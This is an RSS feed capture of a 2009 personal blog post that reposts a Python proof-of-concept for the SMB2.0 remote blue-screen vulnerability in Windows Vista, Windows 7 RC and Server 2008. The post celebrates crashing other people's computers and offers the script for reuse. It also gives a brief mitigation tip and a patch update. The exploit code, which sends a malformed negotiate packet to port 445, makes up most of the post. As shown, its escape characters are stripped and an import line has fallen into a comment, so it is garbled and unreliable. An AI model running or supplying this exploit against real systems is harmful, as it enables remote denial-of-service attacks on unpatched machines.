JustinLee.sg » Windows 95 http://justinlee.sg Taking over the world with every line of code Fri, 03 Feb 2012 06:13:42 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 Taking over the world with every line of code JustinLee.sg no Taking over the world with every line of code JustinLee.sg » Windows 95 http://justinlee.sg/wp-content/plugins/powerpress/rss_default.jpg http://justinlee.sg Good times again with Remote BSOD http://justinlee.sg/2009/09/09/good-times-again-with-remote-bsod/ http://justinlee.sg/2009/09/09/good-times-again-with-remote-bsod/#comments Tue, 08 Sep 2009 16:48:16 +0000 triplez http://www.justinlee.sg/?p=6847 [...]]]> Remember the good old days when you’re able to teardrop someone who was on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for the limited time offer only, we are able to relive this experience once again until Microsoft releases a security patch. This affects all Windows Vista, Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they do release a security patch before Windows 7 officially launches.

Here’s the proof of concept. I’m going to keep a copy here just in case.

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"x00x00x00x90" # Begin SMB header: Session message
"xffx53x4dx42" # Server Component: SMB
"x72x00x00x00" # Negociate Protocol
"x00x18x53xc8" # Operation 0x18 & sub 0xc853
"x00x26"# Process ID High: --> :) normal value should be "x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxffxffxfe"
"x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54"
"x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31"
"x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00"
"x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57"
"x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61"
"x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c"
"x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c"
"x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e"
"x30x30x32x00"

)
s = socket()

s.connect(host)
s.send(buff)
s.close()

To stop your computer from BSOD for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.

Ah! The good old days again.

== Update ==

Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista and Windows Server 2008, and Windows 7 RC.

Original Post: Microsoft Security Advisory 975497 Released

== End Update ==

Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

]]> http://justinlee.sg/2009/09/09/good-times-again-with-remote-bsod/feed/ 2